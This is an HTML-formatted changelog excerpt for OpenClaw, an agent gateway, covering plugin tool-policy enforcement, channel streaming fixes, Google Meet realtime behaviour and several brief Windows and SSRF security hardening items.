<li>Release validation: install the cross-OS TypeScript harness through Windows-safe Node/npm shims so native Windows package checks reach the OpenClaw smoke suites instead of exiting before artifact capture. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Release validation: let Windows packaged-upgrade checks continue after the shipped 2026.5.2 updater hits its native-module swap cleanup fallback, verifying the fallback-installed candidate through package metadata and downstream smoke instead of crashing on the immediate update-status probe. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/plugins: skip channel-derived official plugin installs when another configured plugin is the effective owner for the same channel, so <code>doctor --repair</code> does not reinstall <code>feishu</code> while <code>openclaw-lark</code> handles <code>channels.feishu</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371528550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76623" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76623/hovercard" href="https://github.com/openclaw/openclaw/issues/76623">#76623</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuyizheng3120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuyizheng3120">@fuyizheng3120</a>.</li>
<li>Gateway/sessions: memoize repeated thinking-option enrichment and skip unused cost fallback checks while listing sessions, reducing per-row work on large multi-agent stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372926733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76931" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76931/hovercard" href="https://github.com/openclaw/openclaw/issues/76931">#76931</a>.</li>
<li>Gateway/sessions: bound default <code>sessions.list</code> RPC responses and report truncation metadata, preventing Slack-heavy long-lived stores from forcing unbounded Gateway row construction. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373782015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77062" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77062/hovercard" href="https://github.com/openclaw/openclaw/issues/77062">#77062</a>.</li>
<li>Agents/tools: use config-only runtime snapshots for plugin tool registration and live runtime config getters, avoiding expensive full secrets snapshot clones on the core-plugin-tools prep path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370292544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76295" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76295/hovercard" href="https://github.com/openclaw/openclaw/issues/76295">#76295</a>.</li>
<li>Agents/tools: honor the effective tool denylist before constructing optional PDF/media tool factories, so <code>tools.deny: ["pdf"]</code> skips PDF setup before later policy filtering. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373278886" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76997" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76997/hovercard" href="https://github.com/openclaw/openclaw/issues/76997">#76997</a>.</li>
<li>MCP/plugin tools: apply global <code>tools.profile</code>, <code>tools.alsoAllow</code>, and <code>tools.deny</code> policy while exposing plugin tools over the standalone MCP bridge, so ACP clients do not see policy-hidden plugin tools or miss opt-in optional tools. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin tools: honor explicit tool denylists while selecting plugin tool runtimes, so denied plugin tools are not materialized for direct command or gateway surfaces before later policy filtering. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin tools: filter factory-returned tools by manifest per-tool optional policy, so optional sibling tools from a shared runtime factory stay hidden unless explicitly allowed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/transcripts: retry context-overflow compaction from the current transcript only after the inbound user turn was actually persisted, and keep WebChat agent-run live delivery from writing duplicate Pi-managed assistant turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370788206" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76424" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76424/hovercard" href="https://github.com/openclaw/openclaw/issues/76424">#76424</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373573118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77033" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77033/hovercard" href="https://github.com/openclaw/openclaw/pull/77033">#77033</a>)</li>
<li>Agents/bootstrap: keep pending <code>BOOTSTRAP.md</code> and bootstrap truncation notices in system-prompt Project Context instead of copying setup text or raw warning diagnostics into WebChat user/runtime context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373002853" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76946" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76946/hovercard" href="https://github.com/openclaw/openclaw/issues/76946">#76946</a>.</li>
<li>Gateway/install: keep <code>.env</code>-managed values in the macOS LaunchAgent env file while still tracking <code>OPENCLAW_SERVICE_MANAGED_ENV_KEYS</code>, so regenerated services do not boot without managed auth/provider keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362491875" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75374" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75374/hovercard" href="https://github.com/openclaw/openclaw/issues/75374">#75374</a>.</li>
<li>Gateway/restart: verify listener PIDs by argv when <code>lsof</code> reports only the Node process name, so stale gateway cleanup can find macOS <code>cnode</code> listeners. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317145646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70664" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70664/hovercard" href="https://github.com/openclaw/openclaw/issues/70664">#70664</a>.</li>
<li>Gateway/logging: expand leading <code>~</code> in <code>logging.file</code> before creating the file logger, preventing startup crash loops for home-relative log paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343599652" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73587/hovercard" href="https://github.com/openclaw/openclaw/issues/73587">#73587</a>.</li>
<li>Channels/CLI: keep <code>openclaw channels list --json</code> usable when provider usage fetching fails, and report per-provider usage errors without aborting the channel list. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274421080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67595/hovercard" href="https://github.com/openclaw/openclaw/issues/67595">#67595</a>.</li>
<li>Doctor/plugins: do not treat <code>plugins.allow</code> entries as configured plugins during missing-plugin repair, so restrictive allowlists no longer install allowed-but-unused plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/messaging: deliver distinct final commentary after same-target <code>message</code> tool sends while still deduping text/media already sent by the tool, so short closing remarks are no longer silently dropped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372829643" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76915/hovercard" href="https://github.com/openclaw/openclaw/issues/76915">#76915</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Agents/messaging: preserve string thread IDs when matching message-tool reply dedupe routes, avoiding precision loss on numeric-looking topic IDs before channel plugin comparison. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/streaming: honor <code>agents.defaults.toolProgressDetail: "raw"</code> in Slack, Discord, Telegram, Matrix, and Microsoft Teams progress drafts, so tool-start lines include raw command/detail output when debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/streaming: strip unmatched inline-code backticks from compacted raw progress draft lines, avoiding stray markdown markers after long command details are shortened. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/Slack/Mattermost: align draft preview tool-progress config help with the runtime behavior that hides interim tool updates when <code>streaming.preview.toolProgress</code> is false. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu: use the shared channel progress formatter for streaming-card tool status lines, including raw command/detail output and message-tool filtering. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Mattermost: use the shared progress draft formatter for tool status previews, including raw command/detail output when <code>agents.defaults.toolProgressDetail: "raw"</code> is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Mattermost: suppress standalone default tool-progress messages while draft previews are active, including when draft tool lines are disabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram: deliver button-only interactive replies by sending the shared fallback button-label text with the inline keyboard instead of dropping the reply as empty. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>OpenAI Codex: honor <code>auth.order.openai-codex</code> when starting app-server clients without an explicit auth profile, so status/model probes and implicit startup use the configured Codex account instead of falling back to the default profile. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>OpenAI Codex: let SSRF-guarded provider requests inherit OpenClaw's undici IPv4/IPv6 fallback policy, so ChatGPT-backed Codex runs recover on IPv4-working hosts when DNS still returns unreachable IPv6 addresses. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372541165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76857" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76857/hovercard" href="https://github.com/openclaw/openclaw/issues/76857">#76857</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jplavoiemtl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jplavoiemtl">@jplavoiemtl</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Plugin updates: do not short-circuit trusted official npm updates as unchanged when the default/latest spec still resolves to an already-installed prerelease that the installer should replace with a stable fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin updates: clean stale bundled load paths for already-externalized npm installs whose legacy install record only preserved the resolved package name. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin tools: keep auth-unavailable optional tools hidden even when another default tool from the same plugin is available and <code>tools.alsoAllow</code> names the optional tool. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Realtime transcription: report socket closes before provider readiness as closed-before-ready failures instead of mislabeling them as connection timeouts for OpenAI, xAI, and Deepgram streaming transcription. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>OpenAI/Google Meet: fail realtime voice connection attempts when the socket closes before <code>session.updated</code>, avoiding stuck Meet joins waiting on a bridge that never became ready. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet: avoid treating repeated participant words as multiple assistant-overlap matches when suppressing realtime echo transcripts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet: make <code>mode: "agent"</code> the default Chrome talk-back path, using realtime transcription for input and regular OpenClaw TTS for speech output, while keeping direct realtime voice answers available as <code>mode: "bidi"</code> and accepting <code>mode: "realtime"</code> as an agent-mode compatibility alias.</li>
<li>Codex harness: keep <code>codex_app_server.*</code> telemetry publication owned by the harness instead of republishing the same callback event from core runners. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Slack/Discord: suppress standalone tool-progress chatter when partial preview streaming has <code>streaming.preview.toolProgress: false</code>, matching the documented quiet-preview behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Matrix: bind native approval reaction targets before publishing option reactions, so fast approver reactions on threaded prompts are not dropped while the approval handler finishes setup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet: make realtime talk-back agent-driven by default with <code>realtime.strategy: "agent"</code>, keep the previous direct bidirectional model behavior available as <code>realtime.strategy: "bidi"</code>, route the Meet tab speaker output to <code>BlackHole 2ch</code> automatically for local Chrome realtime joins, coalesce nearby speech transcript fragments before consulting the agent, and avoid cutting off agent speech from server VAD or stale playback pipe errors.</li>
<li>Google Meet: suppress queued assistant playback and assistant-like transcript echoes from the realtime input path, so the meeting does not hear the agent's own speech as a new user turn and loop or cut itself off.</li>
<li>Google Meet: keep Chrome realtime transport tests hermetic on Linux prerelease shards while preserving the macOS-only runtime guard. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Matrix: let the live tool-progress preview and error checks verify progress replacement events without depending on the preview saying <code>Working</code>, <code>tool: read</code>, an unlabelled/pathless <code>read from</code>, or the original draft root being observed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Matrix: keep the target=both approval scenario focused on channel and DM metadata delivery by resolving the accepted approval through the gateway after both Matrix events are observed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Matrix: wait for live approval reactions to echo before starting the threaded approval decision timeout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Matrix: reuse the primed driver sync stream when confirming approval reaction echoes, avoiding missed self-reactions in live release runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/WhatsApp: apply the shared group/channel visible-reply mode during inbound dispatch so group replies stay message-tool-only by default without overriding direct-chat harness defaults. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359986231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75178" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75178/hovercard" href="https://github.com/openclaw/openclaw/issues/75178">#75178</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271747463" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67394/hovercard" href="https://github.com/openclaw/openclaw/issues/67394">#67394</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
<li>Plugins/Codex: preserve Codex-native OAuth routing for <code>/codex bind</code> app-server turns so bound sessions keep the selected Codex auth profile instead of falling back to public OpenAI credentials. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371977999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76714/hovercard" href="https://github.com/openclaw/openclaw/pull/76714">#76714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keshavbotagent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keshavbotagent">@keshavbotagent</a>.</li>
<li>Telegram: keep status checks pointed at the active chat so asking for the current session no longer reports an old direct-message conversation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371945919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76708/hovercard" href="https://github.com/openclaw/openclaw/issues/76708">#76708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Gateway/install: prefer supported system Node over nvm/fnm/volta/asdf/mise when regenerating managed gateway services, so <code>gateway install --force</code> no longer recreates service definitions that doctor immediately flags as version-manager-backed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370479446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76339/hovercard" href="https://github.com/openclaw/openclaw/issues/76339">#76339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Google Chat: normalize Google auth certificate response headers before google-auth-library reads cache-control, so inbound webhook auth no longer rejects with <code>res?.headers.get is not a function</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372631806" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76880/hovercard" href="https://github.com/openclaw/openclaw/issues/76880">#76880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donbowman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donbowman">@donbowman</a>.</li>
<li>WhatsApp: route terminal login QR output through the active runtime for initial and restart sockets, so <code>openclaw channels login --channel whatsapp</code> does not lose the QR behind direct stdout writes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369745219" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76213" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76213/hovercard" href="https://github.com/openclaw/openclaw/issues/76213">#76213</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dougvk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dougvk">@dougvk</a>.</li>
<li>Proxy/debugging: disable debug proxy direct upstream forwarding for proxy requests and CONNECT tunnels while managed proxy mode is active unless <code>OPENCLAW_DEBUG_PROXY_ALLOW_DIRECT_CONNECT_WITH_MANAGED_PROXY=1</code> is explicitly set for approved local diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</li>
<li>Direct APNs: route direct HTTP/2 delivery through the active managed proxy with redacted proxy diagnostics, so push requests honor configured egress controls and <code>openclaw proxy validate --apns-reachable</code> can prove APNs is reachable through the proxy before deployment. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355818960" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74905" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74905/hovercard" href="https://github.com/openclaw/openclaw/pull/74905">#74905</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Agents/subagents: detect prefix-only completion announce replies and fall back to the captured child result so requester chats no longer lose most of long sub-agent reports silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370755013" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76412" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76412/hovercard" href="https://github.com/openclaw/openclaw/issues/76412">#76412</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/inxaos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/inxaos">@inxaos</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davemorin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davemorin">@davemorin</a>.</li>
<li>TUI: replace the stale-response watchdog notice with plain user-facing copy so stalled replies no longer surface backend or streaming internals. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374171377" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77120" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77120/hovercard" href="https://github.com/openclaw/openclaw/pull/77120">#77120</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davemorin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davemorin">@davemorin</a>.</li>
<li>Security/Windows: validate <code>SystemRoot</code>/<code>WINDIR</code> env values through the Windows install-root validator and add them to the dangerous-host-env policy when resolving <code>icacls.exe</code>/<code>whoami.exe</code> for <code>openclaw security audit</code>, so workspace <code>.env</code> overrides and bare command names cannot redirect Windows ACL helpers to attacker-controlled binaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351894295" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74458" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74458/hovercard" href="https://github.com/openclaw/openclaw/pull/74458">#74458</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>.</li>
<li>Security/Windows: pin Windows registry-probe <code>reg.exe</code> resolution to the canonical Windows install root in install-root probing, so <code>SystemRoot</code>/<code>WINDIR</code> env overrides cannot redirect registry queries during Windows host detection. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351875825" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74454" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74454/hovercard" href="https://github.com/openclaw/openclaw/pull/74454">#74454</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>.</li>
<li>QQBot: preserve the framework command authorization decision when converting framework command contexts into engine slash command contexts, so downstream slash handlers see <code>commandAuthorized</code> matching the channel's resolved <code>isAuthorizedSender</code> instead of a hardcoded <code>true</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378626375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77453/hovercard" href="https://github.com/openclaw/openclaw/pull/77453">#77453</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Security/Windows: block <code>LOCALAPPDATA</code> from workspace <code>.env</code> and resolve Windows update-flow portable Git path prepends from the trusted process-local <code>LOCALAPPDATA</code> only, so workspace-supplied values cannot redirect <code>git</code> discovery during <code>openclaw update</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378845160" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77470/hovercard" href="https://github.com/openclaw/openclaw/pull/77470">#77470</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Browser/SSRF: enforce the existing current-tab URL navigation policy before tab-scoped debug, export, and read routes (console, page errors, network requests, trace start/stop, response body, screenshot, snapshot, storage, etc.) collect from an already-selected tab, so blocked tabs return a policy error instead of being read first and redacted only at response time. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365339565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75731" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75731/hovercard" href="https://github.com/openclaw/openclaw/pull/75731">#75731</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
